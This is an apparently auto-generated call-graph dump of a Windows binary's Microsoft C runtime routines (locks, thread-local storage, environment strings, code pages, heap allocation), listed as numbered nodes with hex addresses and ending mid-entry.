___vcrt_uninitialize_locks DeleteCriticalSection 16899->16901 16900->16882 16902 b043d1 16900->16902 16901->16900 16931 b0f53a 16902->16931 16905 b043e6 16905->16884 16908 b04401 16908->16884 16911 b053ac 16910->16911 16912 b0538d 16910->16912 16911->16882 16913 b05397 DeleteCriticalSection 16912->16913 16913->16911 16913->16913 16919 b0f6bb 16914->16919 16917 b0f661 InitializeCriticalSectionAndSpinCount 16918 b0f64c 16917->16918 16918->16897 16920 b0f6dc 16919->16920 16921 b0f643 16919->16921 16920->16921 16922 b0f744 GetProcAddress 16920->16922 16924 b0f735 16920->16924 16926 b0f670 LoadLibraryExW 16920->16926 16921->16917 16921->16918 16922->16921 16924->16922 16925 b0f73d FreeLibrary 16924->16925 16925->16922 16927 b0f687 GetLastError 16926->16927 16929 b0f6b7 16926->16929 16928 b0f692 ___vcrt_FlsFree 16927->16928 16927->16929 16928->16929 16930 b0f6a8 LoadLibraryExW 16928->16930 16929->16920 16930->16920 16932 b0f6bb ___vcrt_FlsFree 5 API calls 16931->16932 16933 b0f554 16932->16933 16934 b0f56d TlsAlloc 16933->16934 16935 b043db 16933->16935 16935->16905 16936 b0f5eb 16935->16936 16937 b0f6bb ___vcrt_FlsFree 5 API calls 16936->16937 16938 b0f605 16937->16938 16939 b0f620 TlsSetValue 16938->16939 16940 b043f4 16938->16940 16939->16940 16940->16908 16941 b04404 16940->16941 16942 b04414 16941->16942 16943 b0440e 16941->16943 16942->16905 16945 b0f575 16943->16945 16946 b0f6bb ___vcrt_FlsFree 5 API calls 16945->16946 16947 b0f58f 16946->16947 16948 b0f5a7 TlsFree 16947->16948 16949 b0f59b 16947->16949 16948->16949 16949->16942 16951 b079f9 16950->16951 16952 af73a1 16950->16952 16951->16952 16954 b07152 16951->16954 16952->16846 16952->16890 16955 b07159 16954->16955 16956 b0719c GetStdHandle 16955->16956 16957 b071fe 16955->16957 16958 b071af GetFileType 16955->16958 16956->16955 16957->16951 16958->16955 16960 b017f4 16959->16960 16961 b017de 16959->16961 16960->16850 16961->16960 16965 b01716 16961->16965 16963 b017eb 16963->16960 16982 b018e3 16963->16982 16966 b01722 16965->16966 16967 b0171f 16965->16967 16991 b07220 16966->16991 16967->16963 16972 b01733 16974 b05677 ___free_lconv_mon 14 API calls 16972->16974 16973 b0173f 17018 b01801 16973->17018 16976 b01739 16974->16976 16976->16963 16978 b05677 ___free_lconv_mon 14 API calls 16979 b01763 16978->16979 16980 b05677 ___free_lconv_mon 14 API calls 16979->16980 16981 b01769 16980->16981 16981->16963 16983 b01954 16982->16983 16985 b018f2 16982->16985 16983->16960 16984 b069b4 _unexpected 14 API calls 16984->16985 16985->16983 16985->16984 16987 b057c1 WideCharToMultiByte _Fputc 16985->16987 16988 b01958 16985->16988 16990 b05677 ___free_lconv_mon 14 API calls 16985->16990 17545 b0ca05 16985->17545 16986 b05677 ___free_lconv_mon 14 API calls 16986->16983 16987->16985 16988->16986 16990->16985 16992 b01728 16991->16992 16993 b07229 16991->16993 16997 b0c92e GetEnvironmentStringsW 16992->16997 17040 b059c5 16993->17040 16998 b0c946 16997->16998 17011 b0172d 16997->17011 16999 b057c1 _Fputc WideCharToMultiByte 16998->16999 17000 b0c963 16999->17000 17001 b0c978 17000->17001 17002 b0c96d FreeEnvironmentStringsW 17000->17002 17003 b056b1 __strnicoll 15 API calls 17001->17003 17002->17011 17004 b0c97f 17003->17004 17005 b0c987 17004->17005 17006 b0c998 17004->17006 17007 b05677 ___free_lconv_mon 14 API calls 17005->17007 17008 b057c1 _Fputc WideCharToMultiByte 17006->17008 17009 b0c98c FreeEnvironmentStringsW 17007->17009 17010 b0c9a8 17008->17010 17009->17011 17012 b0c9b7 17010->17012 17013 b0c9af 17010->17013 17011->16972 17011->16973 17015 b05677 ___free_lconv_mon 14 API calls 17012->17015 17014 b05677 ___free_lconv_mon 14 API calls 17013->17014 17016 b0c9b5 FreeEnvironmentStringsW 17014->17016 17015->17016 17016->17011 17019 b01816 17018->17019 17020 b069b4 _unexpected 14 API calls 17019->17020 17021 b0183d 17020->17021 17022 b01845 17021->17022 17031 b0184f 17021->17031 17023 b05677 ___free_lconv_mon 14 API calls 17022->17023 17024 b01746 17023->17024 17024->16978 17025 b018ac 17026 b05677 ___free_lconv_mon 14 API calls 17025->17026 17026->17024 17027 b069b4 _unexpected 14 API calls 17027->17031 17028 b018bb 17535 b017a6 17028->17535 17031->17025 17031->17027 17031->17028 17033 b018d6 17031->17033 17036 b05677 ___free_lconv_mon 14 API calls 17031->17036 17526 b052ec 17031->17526 17541 b019ec IsProcessorFeaturePresent 17033->17541 17034 b05677 ___free_lconv_mon 14 API calls 17035 b018c8 17034->17035 17038 b05677 ___free_lconv_mon 14 API calls 17035->17038 17036->17031 17038->17024 17039 b018e2 17041 b059d0 17040->17041 17042 b059d6 17040->17042 17090 b06334 17041->17090 17047 b059dc 17042->17047 17095 b06373 17042->17095 17046 b059f4 17100 b069b4 17046->17100 17050 b059e1 17047->17050 17112 b01f43 17047->17112 17068 b075e1 17050->17068 17053 b05a08 17055 b06373 _unexpected 6 API calls 17053->17055 17054 b05a1d 17056 b06373 _unexpected 6 API calls 17054->17056 17065 b05a14 17055->17065 17057 b05a29 17056->17057 17058 b05a3c 17057->17058 17059 b05a2d 17057->17059 17107 b05c1c 17058->17107 17062 b06373 _unexpected 6 API calls 17059->17062 17061 b05677 ___free_lconv_mon 14 API calls 17064 b05a1a 17061->17064 17062->17065 17064->17047 17065->17061 17066 b05677 ___free_lconv_mon 14 API calls 17067 b05a4e 17066->17067 17067->17050 17069 b0760b 17068->17069 17344 b0746d 17069->17344 17072 b07624 17072->16992 17075 b0764b 17358 b07268 17075->17358 17076 b0763d 17078 b05677 ___free_lconv_mon 14 API calls 17076->17078 17078->17072 17080 b07683 17081 b012d4 __dosmaperr 14 API calls 17080->17081 17082 b07688 17081->17082 17086 b05677 ___free_lconv_mon 14 API calls 17082->17086 17083 b0769e 17084 b076ca 17083->17084 17089 b05677 ___free_lconv_mon 14 API calls 17083->17089 17085 b07713 17084->17085 17369 b0799c 17084->17369 17088 b05677 ___free_lconv_mon 14 API calls 17085->17088 17086->17072 17088->17072 17089->17084 17091 b066cd std::_Lockit::_Lockit 5 API calls 17090->17091 17092 b06350 17091->17092 17093 b06359 17092->17093 17094 b0636b TlsGetValue 17092->17094 17093->17042 17096 b066cd std::_Lockit::_Lockit 5 API calls 17095->17096 17097 b0638f 17096->17097 17098 b059f0 17097->17098 17099 b063ad TlsSetValue 17097->17099 17098->17046 17098->17047 17105 b069c1 _unexpected 17100->17105 17101 b06a01 17103 b012d4 __dosmaperr 13 API calls 17101->17103 17102 b069ec HeapAlloc 17104 b05a00 17102->17104 17102->17105 17103->17104 17104->17053 17104->17054 17105->17101 17105->17102 17123 aff46b 17105->17123 17137 b05d82 17107->17137 17239 b07aa0 17112->17239 17114 b01f53 17117 b01f5d IsProcessorFeaturePresent 17114->17117 17118 b01f7c 17114->17118 17119 b01f69 17117->17119 17120 aff14f CallUnexpected 21 API calls 17118->17120 17269 b01a20 17119->17269 17122 b01f86 17120->17122 17126 aff4a6 17123->17126 17127 aff4b2 ___scrt_is_nonwritable_in_current_image 17126->17127 17132 b01cd1 EnterCriticalSection 17127->17132 17129 aff4bd CallUnexpected 17133 aff4f4 17129->17133 17132->17129 17136 b01ce8 LeaveCriticalSection 17133->17136 17135 aff476 17135->17105 17136->17135 17138 b05d8e ___scrt_is_nonwritable_in_current_image 17137->17138 17151 b01cd1 EnterCriticalSection 17138->17151 17140 b05d98 17152 b05dc8 17140->17152 17143 b05dd4 17144 b05de0 ___scrt_is_nonwritable_in_current_image 17143->17144 17156 b01cd1 EnterCriticalSection 17144->17156 17146 b05dea 17157 b05bd1 17146->17157 17148 b05e02 17161 b05e22 17148->17161 17151->17140 17155 b01ce8 LeaveCriticalSection 17152->17155 17154 b05c8a 17154->17143 17155->17154 17156->17146 17158 b05c07 __Getctype 17157->17158 17159 b05be0 __Getctype 17157->17159 17158->17148 17159->17158 17164 b09e4a 17159->17164 17238 b01ce8 LeaveCriticalSection 17161->17238 17163 b05a47 17163->17066 17165 b09eca 17164->17165 17168 b09e60 17164->17168 17166 b09f18 17165->17166 17169 b05677 ___free_lconv_mon 14 API calls 17165->17169 17232 b09fe4 17166->17232 17168->17165 17170 b09e93 17168->17170 17175 b05677 ___free_lconv_mon 14 API calls 17168->17175 17171 b09eec 17169->17171 17172 b09eb5 17170->17172 17180 b05677 ___free_lconv_mon 14 API calls 17170->17180 17173 b05677 ___free_lconv_mon 14 API calls 17171->17173 17174 b05677 ___free_lconv_mon 14 API calls 17172->17174 17176 b09eff 17173->17176 17177 b09ebf 17174->17177 17179 b09e88 17175->17179 17181 b05677 ___free_lconv_mon 14 API calls 17176->17181 17182 b05677 ___free_lconv_mon 14 API calls 17177->17182 17178 b09f86 17183 b05677 ___free_lconv_mon 14 API calls 17178->17183 17192 b092a1 17179->17192 17185 b09eaa 17180->17185 17186 b09f0d 17181->17186 17182->17165 17188 b09f8c 17183->17188 17220 b095bd 17185->17220 17191 b05677 ___free_lconv_mon 14 API calls 17186->17191 17187 b05677 14 API calls ___free_lconv_mon 17189 b09f26 17187->17189 17188->17158 17189->17178 17189->17187 17191->17166 17193 b092b2 17192->17193 17219 b0939b 17192->17219 17194 b092c3 17193->17194 17195 b05677 ___free_lconv_mon 14 API calls 17193->17195 17196 b092d5 17194->17196 17198 b05677 ___free_lconv_mon 14 API calls 17194->17198 17195->17194 17197 b092e7 17196->17197 17199 b05677 ___free_lconv_mon 14 API calls 17196->17199 17200 b092f9 17197->17200 17201 b05677 ___free_lconv_mon 14 API calls 17197->17201 17198->17196 17199->17197 17202 b0930b 17200->17202 17203 b05677 ___free_lconv_mon 14 API calls 17200->17203 17201->17200 17204 b0931d 17202->17204 17206 b05677 ___free_lconv_mon 14 API calls 17202->17206 17203->17202 17206->17204 17219->17170 17221 b095ca 17220->17221 17231 b09622 17220->17231 17222 b095da 17221->17222 17223 b05677 ___free_lconv_mon 14 API calls 17221->17223 17224 b05677 ___free_lconv_mon 14 API calls 17222->17224 17225 b095ec 17222->17225 17223->17222 17224->17225 17226 b095fe 17225->17226 17227 b05677 ___free_lconv_mon 14 API calls 17225->17227 17228 b09610 17226->17228 17229 b05677 ___free_lconv_mon 14 API calls 17226->17229 17227->17226 17230 b05677 ___free_lconv_mon 14 API calls 17228->17230 17228->17231 17229->17228 17230->17231 17231->17172 17233 b09ff1 17232->17233 17234 b0a010 17232->17234 17233->17234 17235 b096ab __Getctype 14 API calls 17233->17235 17234->17189 17236 b0a00a 17235->17236 17237 b05677 ___free_lconv_mon 14 API calls 17236->17237 17237->17234 17238->17163 17275 b07d23 17239->17275 17242 b07ac7 17248 b07ad3 ___scrt_is_nonwritable_in_current_image 17242->17248 17243 b05a5b __dosmaperr 14 API calls 17246 b07b04 CallUnexpected 17243->17246 17244 b07b35 CallUnexpected 17251 b07b6b CallUnexpected 17244->17251 17289 b01cd1 EnterCriticalSection 17244->17289 17245 b07b23 17247 b012d4 __dosmaperr 14 API calls 17245->17247 17246->17244 17246->17245 17260 b07b0d 17246->17260 17249 b07b28 17247->17249 17248->17243 17248->17244 17248->17245 17248->17246 17286 b019bf 17249->17286 17254 b07ca5 17251->17254 17255 b07ba8 17251->17255 17266 b07bd6 17251->17266 17256 b07cb0 17254->17256 17321 b01ce8 LeaveCriticalSection 17254->17321 17255->17266 17290 b0590a GetLastError 17255->17290 17259 aff14f CallUnexpected 21 API calls 17256->17259 17261 b07cb8 17259->17261 17260->17114 17264 b0590a _unexpected 39 API calls 17267 b07c2b 17264->17267 17265 b0590a _unexpected 39 API calls 17265->17266 17317 b07c51 17266->17317 17267->17260 17268 b0590a _unexpected 39 API calls 17267->17268 17268->17260 17270 b01a3c std::invalid_argument::invalid_argument CallUnexpected 17269->17270 17271 b01a68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17270->17271 17274 b01b39 CallUnexpected 17271->17274 17273 b01b57 17273->17118 17336 af7191 17274->17336 17276 b07d2f ___scrt_is_nonwritable_in_current_image 17275->17276 17281 b01cd1 EnterCriticalSection 17276->17281 17278 b07d3d 17282 b07d7f 17278->17282 17281->17278 17285 b01ce8 LeaveCriticalSection 17282->17285 17284 b01f48 17284->17114 17284->17242 17285->17284 17322 b01c0e 17286->17322 17288 b019cb 17288->17260 17289->17251 17291 b05920 17290->17291 17292 b05926 17290->17292 17293 b06334 _unexpected 6 API calls 17291->17293 17294 b06373 _unexpected 6 API calls 17292->17294 17315 b0592a SetLastError 17292->17315 17293->17292 17295 b05942 17294->17295 17297 b069b4 _unexpected 14 API calls 17295->17297 17295->17315 17298 b05957 17297->17298 17301 b05970 17298->17301 17302 b0595f 17298->17302 17299 b059ba 17299->17265 17300 b059bf 17303 b01f43 CallUnexpected 37 API calls 17300->17303 17305 b06373 _unexpected 6 API calls 17301->17305 17304 b06373 _unexpected 6 API calls 17302->17304 17306 b059c4 17303->17306 17307 b0596d 17304->17307 17308 b0597c 17305->17308 17313 b05677 ___free_lconv_mon 14 API calls 17307->17313 17309 b05980 17308->17309 17310 b05997 17308->17310 17312 b06373 _unexpected 6 API calls 17309->17312 17311 b05c1c _unexpected 14 API calls 17310->17311 17314 b059a2 17311->17314 17312->17307 17313->17315 17316 b05677 ___free_lconv_mon 14 API calls 17314->17316 17315->17299 17315->17300 17316->17315 17318 b07c55 17317->17318 17320 b07c1d 17317->17320 17335 b01ce8 LeaveCriticalSection 17318->17335 17320->17260 17320->17264 17320->17267 17321->17256 17323 b01c20 _Fputc 17322->17323 17326 b01b68 17323->17326 17325 b01c38 _Fputc 17325->17288 17327 b01b7f 17326->17327 17328 b01b78 17326->17328 17330 b01be5 _Fputc GetLastError SetLastError 17327->17330 17334 b01b8d 17327->17334 17329 afd5e0 _Fputc 16 API calls 17328->17329 17329->17327 17331 b01bb4 17330->17331 17332 b019ec __Getctype 11 API calls 17331->17332 17331->17334 17333 b01be4 17332->17333 17334->17325 17335->17320 17337 af719a IsProcessorFeaturePresent 17336->17337 17338 af7199 17336->17338 17340 af958d 17337->17340 17338->17273 17343 af9673 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17340->17343 17342 af9670 17342->17273 17343->17342 17377 afc7aa 17344->17377 17347 b074a0 17349 b074a5 GetACP 17347->17349 17350 b074b7 17347->17350 17348 b0748e GetOEMCP 17348->17350 17349->17350 17350->17072 17351 b056b1 17350->17351 17352 b056ef 17351->17352 17357 b056bf _unexpected 17351->17357 17353 b012d4 __dosmaperr 14 API calls 17352->17353 17355 b056ed 17353->17355 17354 b056da RtlAllocateHeap 17354->17355 17354->17357 17355->17075 17355->17076 17356 aff46b std::ios_base::_Init 2 API calls 17356->17357 17357->17352 17357->17354 17357->17356 17359 b0746d 41 API calls 17358->17359 17361 b07288 17359->17361 17360 b072e0 std::invalid_argument::invalid_argument 17417 b077f7 17360->17417 17361->17360 17362 b072c5 IsValidCodePage 17361->17362 17368 b0738d 17361->17368 17364 b072d7 17362->17364 17362->17368 17363 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17365 b0746b 17363->17365 17364->17360 17366 b07300 GetCPInfo 17364->17366 17365->17080 17365->17083 17366->17360 17366->17368 17368->17363 17370 b079a8 ___scrt_is_nonwritable_in_current_image 17369->17370 17500 b01cd1 EnterCriticalSection 17370->17500 17372 b079b2 17501 b07736 17372->17501 17378 afc7c8 17377->17378 17384 afc7c1 17377->17384 17379 b0590a _unexpected 39 API calls 17378->17379 17378->17384 17380 afc7e9 17379->17380 17385 b05eee 17380->17385 17384->17347 17384->17348 17386 b05f01 17385->17386 17388 afc7ff 17385->17388 17386->17388 17393 b0a015 17386->17393 17389 b05f1b 17388->17389 17390 b05f43 17389->17390 17391 b05f2e 17389->17391 17390->17384 17391->17390 17414 b07202 17391->17414 17394 b0a021 ___scrt_is_nonwritable_in_current_image 17393->17394 17395 b0590a _unexpected 39 API calls 17394->17395 17396 b0a02a 17395->17396 17397 b0a070 17396->17397 17406 b01cd1 EnterCriticalSection 17396->17406 17397->17388 17399 b0a048 17407 b0a096 17399->17407 17404 b01f43 CallUnexpected 39 API calls 17405 b0a095 17404->17405 17406->17399 17408 b0a0a4 __Getctype 17407->17408 17410 b0a059 17407->17410 17409 b09e4a __Getctype 14 API calls 17408->17409 17408->17410 17409->17410 17411 b0a075 17410->17411 17412 b01ce8 std::_Lockit::~_Lockit LeaveCriticalSection 17411->17412 17413 b0a06c 17412->17413 17413->17397 17413->17404 17415 b0590a _unexpected 39 API calls 17414->17415 17416 b07207 17415->17416 17416->17390 17418 b0781f GetCPInfo 17417->17418 17419 b078e8 17417->17419 17418->17419 17424 b07837 17418->17424 17421 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17419->17421 17423 b0799a 17421->17423 17423->17368 17428 b06ca0 17424->17428 17429 afc7aa __strnicoll 39 API calls 17428->17429 17430 b06cc0 17429->17430 17448 b056ff 17430->17448 17432 b06d7c 17435 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17432->17435 17433 b06d74 17451 af9ec7 17433->17451 17434 b06ced 17434->17432 17434->17433 17437 b056b1 __strnicoll 15 API calls 17434->17437 17439 b06d12 std::invalid_argument::invalid_argument __alloca_probe_16 17434->17439 17438 b06d9f 17435->17438 17437->17439 17443 b06da1 17438->17443 17439->17433 17440 b056ff __strnicoll MultiByteToWideChar 17439->17440 17441 b06d5b 17440->17441 17441->17433 17442 b06d62 GetStringTypeW 17441->17442 17442->17433 17444 afc7aa __strnicoll 39 API calls 17443->17444 17445 b06db4 17444->17445 17460 b06dea 17445->17460 17455 b05729 17448->17455 17452 af9ed1 17451->17452 17454 af9ee2 17451->17454 17452->17454 17457 b02a1e 17452->17457 17454->17432 17456 b0571b MultiByteToWideChar 17455->17456 17456->17434 17458 b05677 ___free_lconv_mon 14 API calls 17457->17458 17459 b02a36 17458->17459 17459->17454 17461 b06e05 __strnicoll 17460->17461 17462 b056ff __strnicoll MultiByteToWideChar 17461->17462 17465 b06e49 17462->17465 17463 b06fc4 17465->17463 17467 b056b1 __strnicoll 15 API calls 17465->17467 17469 b06e6f __alloca_probe_16 17465->17469 17487 b06f17 17465->17487 17467->17469 17469->17487 17500->17372 17511 b0337b 17501->17511 17503 b07758 17504 b0337b 29 API calls 17503->17504 17505 b07777 17504->17505 17506 b05677 ___free_lconv_mon 14 API calls 17505->17506 17507 b0779e 17505->17507 17506->17507 17508 b079dd 17507->17508 17525 b01ce8 LeaveCriticalSection 17508->17525 17510 b079cb 17510->17085 17512 b0338c 17511->17512 17521 b03388 codecvt 17511->17521 17513 b03393 17512->17513 17516 b033a6 std::invalid_argument::invalid_argument 17512->17516 17514 b012d4 __dosmaperr 14 API calls 17513->17514 17515 b03398 17514->17515 17517 b019bf __strnicoll 29 API calls 17515->17517 17518 b033d4 17516->17518 17519 b033dd 17516->17519 17516->17521 17517->17521 17520 b012d4 __dosmaperr 14 API calls 17518->17520 17519->17521 17523 b012d4 __dosmaperr 14 API calls 17519->17523 17522 b033d9 17520->17522 17521->17503 17524 b019bf __strnicoll 29 API calls 17522->17524 17523->17522 17524->17521 17525->17510 17527 b052fa 17526->17527 17528 b05308 17526->17528 17527->17528 17533 b05320 17527->17533 17529 b012d4 __dosmaperr 14 API calls 17528->17529 17530 b05310 17529->17530 17531 b019bf __strnicoll 29 API calls 17530->17531 17532 b0531a 17531->17532 17532->17031 17533->17532 17534 b012d4 __dosmaperr 14 API calls 17533->17534 17534->17530 17536 b017d0 17535->17536 17537 b017b3 17535->17537 17536->17034 17538 b017ca 17537->17538 17539 b05677 ___free_lconv_mon 14 API calls 17537->17539 17540 b05677 ___free_lconv_mon 14 API calls 17538->17540 17539->17537 17540->17536 17542 b019f8 17541->17542 17543 b01a20 CallUnexpected 8 API calls 17542->17543 17544 b01a0d GetCurrentProcess TerminateProcess 17543->17544 17544->17039 17546 b0ca10 17545->17546 17547 b0ca21 17546->17547 17550 b0ca34 ___from_strstr_to_strchr 17546->17550 17548 b012d4 __dosmaperr 14 API calls 17547->17548 17558 b0ca26 17548->17558 17549 b0cc4b 17551 b012d4 __dosmaperr 14 API calls 17549->17551 17550->17549 17552 b0ca54 17550->17552 17553 b0cc50 17551->17553 17608 b0cc70 17552->17608 17555 b05677 ___free_lconv_mon 14 API calls 17553->17555 17555->17558 17557 b0ca98 17595 b0ca84 17557->17595 17612 b0cc8a 17557->17612 17558->16985 17559 b0ca9a 17563 b069b4 _unexpected 14 API calls 17559->17563 17559->17595 17560 b0ca76 17567 b0ca93 17560->17567 17568 b0ca7f 17560->17568 17564 b0caa8 17563->17564 17566 b05677 ___free_lconv_mon 14 API calls 17564->17566 17565 b05677 ___free_lconv_mon 14 API calls 17565->17558 17570 b0cab3 17566->17570 17572 b0cc70 39 API calls 17567->17572 17571 b012d4 __dosmaperr 14 API calls 17568->17571 17569 b0cb0d 17573 b05677 ___free_lconv_mon 14 API calls 17569->17573 17570->17557 17577 b069b4 _unexpected 14 API calls 17570->17577 17570->17595 17571->17595 17572->17557 17579 b0cb15 17573->17579 17574 b0cb58 17575 b0c025 std::ios_base::_Init 32 API calls 17574->17575 17574->17595 17576 b0cb86 17575->17576 17578 b05677 ___free_lconv_mon 14 API calls 17576->17578 17580 b0cacf 17577->17580 17585 b0cb42 17578->17585 17579->17585 17616 b0c025 17579->17616 17584 b05677 ___free_lconv_mon 14 API calls 17580->17584 17581 b0cc40 17582 b05677 ___free_lconv_mon 14 API calls 17581->17582 17582->17558 17584->17557 17585->17581 17585->17585 17588 b069b4 _unexpected 14 API calls 17585->17588 17585->17595 17586 b0cb39 17587 b05677 ___free_lconv_mon 14 API calls 17586->17587 17587->17585 17589 b0cbd1 17588->17589 17590 b0cbe1 17589->17590 17591 b0cbd9 17589->17591 17593 b052ec ___std_exception_copy 29 API calls 17590->17593 17592 b05677 ___free_lconv_mon 14 API calls 17591->17592 17592->17595 17594 b0cbed 17593->17594 17596 b0cbf4 17594->17596 17597 b0cc65 17594->17597 17595->17565 17625 b138ec 17596->17625 17599 b019ec __Getctype 11 API calls 17597->17599 17601 b0cc6f 17599->17601 17602 b0cc3a 17605 b05677 ___free_lconv_mon 14 API calls 17602->17605 17603 b0cc1b 17604 b012d4 __dosmaperr 14 API calls 17603->17604 17606 b0cc20 17604->17606 17605->17581 17607 b05677 ___free_lconv_mon 14 API calls 17606->17607 17607->17595 17609 b0ca5f 17608->17609 17610 b0cc7d 17608->17610 17609->17557 17609->17559 17609->17560 17640 b0ccdf 17610->17640 17613 b0cca0 17612->17613 17615 b0cafd 17612->17615 17613->17615 17655 b137fb 17613->17655 17615->17569 17615->17574 17617 b0c032 17616->17617 17618 b0c04d 17616->17618 17617->17618 17620 b0c03e 17617->17620 17619 b0c05c 17618->17619 17755 b12784 17618->17755 17762 b0efc5 17619->17762 17622 b012d4 __dosmaperr 14 API calls 17620->17622 17624 b0c043 std::invalid_argument::invalid_argument 17622->17624 17624->17586 17774 b06975 17625->17774 17630 b06975 39 API calls 17633 b1393c 17630->17633 17631 b1395f 17632 b1396b 17631->17632 17634 b05677 ___free_lconv_mon 14 API calls 17631->17634 17635 b0cc15 17632->17635 17637 b05677 ___free_lconv_mon 14 API calls 17632->17637 17636 afc8a4 17 API calls 17633->17636 17634->17632 17635->17602 17635->17603 17638 b13949 17636->17638 17637->17635 17638->17631 17639 b13953 SetEnvironmentVariableW 17638->17639 17639->17631 17641 b0ccf2 17640->17641 17642 b0cced 17640->17642 17643 b069b4 _unexpected 14 API calls 17641->17643 17642->17609 17652 b0cd0f 17643->17652 17644 b0cd7d 17646 b01f43 CallUnexpected 39 API calls 17644->17646 17645 b0cd6c 17647 b05677 ___free_lconv_mon 14 API calls 17645->17647 17648 b0cd82 17646->17648 17647->17642 17649 b019ec __Getctype 11 API calls 17648->17649 17650 b0cd8e 17649->17650 17651 b069b4 _unexpected 14 API calls 17651->17652 17652->17644 17652->17645 17652->17648 17652->17651 17653 b05677 ___free_lconv_mon 14 API calls 17652->17653 17654 b052ec ___std_exception_copy 29 API calls 17652->17654 17653->17652 17654->17652 17656 b13809 17655->17656 17657 b1380f 17655->17657 17660 b14023 17656->17660 17661 b1406b 17656->17661 17673 b13824 17657->17673 17663 b14029 17660->17663 17666 b14046 17660->17666 17693 b14081 17661->17693 17664 b012d4 __dosmaperr 14 API calls 17663->17664 17665 b1402e 17664->17665 17667 b019bf __strnicoll 29 API calls 17665->17667 17668 b012d4 __dosmaperr 14 API calls 17666->17668 17672 b14064 17666->17672 17669 b14039 17667->17669 17670 b14055 17668->17670 17669->17613 17671 b019bf __strnicoll 29 API calls 17670->17671 17671->17669 17672->17613 17674 afc7aa __strnicoll 39 API calls 17673->17674 17677 b1383a 17674->17677 17675 b1381f 17675->17613 17676 b13856 17679 b012d4 __dosmaperr 14 API calls 17676->17679 17677->17675 17677->17676 17678 b1386d 17677->17678 17681 b13876 17678->17681 17682 b13888 17678->17682 17680 b1385b 17679->17680 17685 b019bf __strnicoll 29 API calls 17680->17685 17686 b012d4 __dosmaperr 14 API calls 17681->17686 17683 b13895 17682->17683 17684 b138a8 17682->17684 17687 b14081 __strnicoll 39 API calls 17683->17687 17711 b1414c 17684->17711 17685->17675 17689 b1387b 17686->17689 17687->17675 17691 b019bf __strnicoll 29 API calls 17689->17691 17691->17675 17692 b012d4 __dosmaperr 14 API calls 17692->17675 17694 b14091 17693->17694 17695 b140ab 17693->17695 17696 b012d4 __dosmaperr 14 API calls 17694->17696 17697 b140b3 17695->17697 17698 b140ca 17695->17698 17699 b14096 17696->17699 17700 b012d4 __dosmaperr 14 API calls 17697->17700 17701 b140d6 17698->17701 17702 b140ed 17698->17702 17703 b019bf __strnicoll 29 API calls 17699->17703 17704 b140b8 17700->17704 17705 b012d4 __dosmaperr 14 API calls 17701->17705 17706 afc7aa __strnicoll 39 API calls 17702->17706 17710 b140a1 17702->17710 17703->17710 17707 b019bf __strnicoll 29 API calls 17704->17707 17708 b140db 17705->17708 17706->17710 17707->17710 17709 b019bf __strnicoll 29 API calls 17708->17709 17709->17710 17710->17669 17712 afc7aa __strnicoll 39 API calls 17711->17712 17713 b1415f 17712->17713 17716 b14192 17713->17716 17721 b141c6 __strnicoll 17716->17721 17717 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17718 b138be 17717->17718 17718->17675 17718->17692 17719 b14246 17722 b056ff __strnicoll MultiByteToWideChar 17719->17722 17728 b1424a 17719->17728 17720 b1442a 17721->17719 17721->17720 17723 b14233 GetCPInfo 17721->17723 17721->17728 17725 b142cc 17722->17725 17723->17719 17723->17728 17724 b1441e 17726 af9ec7 __freea 14 API calls 17724->17726 17725->17724 17727 b056b1 __strnicoll 15 API calls 17725->17727 17725->17728 17729 b142f3 __alloca_probe_16 17725->17729 17726->17728 17727->17729 17728->17717 17728->17720 17729->17724 17730 b056ff __strnicoll MultiByteToWideChar 17729->17730 17731 b1433f 17730->17731 17731->17724 17732 b056ff __strnicoll MultiByteToWideChar 17731->17732 17733 b1435b 17732->17733 17733->17724 17734 b14369 17733->17734 17735 b143cc 17734->17735 17736 b056b1 __strnicoll 15 API calls 17734->17736 17740 b14382 __alloca_probe_16 17734->17740 17737 af9ec7 __freea 14 API calls 17735->17737 17736->17740 17738 b143d2 17737->17738 17739 af9ec7 __freea 14 API calls 17738->17739 17739->17728 17740->17735 17741 b056ff __strnicoll MultiByteToWideChar 17740->17741 17742 b143c5 17741->17742 17742->17735 17743 b143ee 17742->17743 17749 b06205 17743->17749 17750 b0676c std::_Lockit::_Lockit 5 API calls 17749->17750 17751 b06210 17750->17751 17752 b0654f __strnicoll 5 API calls 17751->17752 17754 b06216 17751->17754 17753 b06256 CompareStringW 17752->17753 17753->17754 17756 b127a4 HeapSize 17755->17756 17757 b1278f 17755->17757 17756->17619 17758 b012d4 __dosmaperr 14 API calls 17757->17758 17759 b12794 17758->17759 17760 b019bf __strnicoll 29 API calls 17759->17760 17761 b1279f 17760->17761 17761->17619 17763 b0efd2 17762->17763 17764 b0efdd 17762->17764 17765 b056b1 __strnicoll 15 API calls 17763->17765 17766 b0efe5 17764->17766 17772 b0efee _unexpected 17764->17772 17770 b0efda 17765->17770 17767 b05677 ___free_lconv_mon 14 API calls 17766->17767 17767->17770 17768 b0eff3 17771 b012d4 __dosmaperr 14 API calls 17768->17771 17769 b0f018 HeapReAlloc 17769->17770 17769->17772 17770->17624 17771->17770 17772->17768 17772->17769 17773 aff46b std::ios_base::_Init 2 API calls 17772->17773 17773->17772 17775 afc7aa __strnicoll 39 API calls 17774->17775 17776 b06987 17775->17776 17777 b06999 17776->17777 17782 b061e6 17776->17782 17779 afc8a4 17777->17779 17788 afc8fc 17779->17788 17785 b06752 17782->17785 17786 b066cd std::_Lockit::_Lockit 5 API calls 17785->17786 17787 b061ee 17786->17787 17787->17777 17789 afc90a 17788->17789 17790 afc924 17788->17790 17806 afc88a 17789->17806 17791 afc92b 17790->17791 17792 afc94a 17790->17792 17805 afc8bc 17791->17805 17810 afc84b 17791->17810 17794 b056ff __strnicoll MultiByteToWideChar 17792->17794 17796 afc959 17794->17796 17797 afc960 GetLastError 17796->17797 17799 afc84b 15 API calls 17796->17799 17802 afc986 17796->17802 17815 b012fa 17797->17815 17799->17802 17800 b056ff __strnicoll MultiByteToWideChar 17803 afc99d 17800->17803 17802->17800 17802->17805 17803->17797 17803->17805 17804 b012d4 __dosmaperr 14 API calls 17804->17805 17805->17630 17805->17631 17807 afc895 17806->17807 17808 afc89d 17806->17808 17809 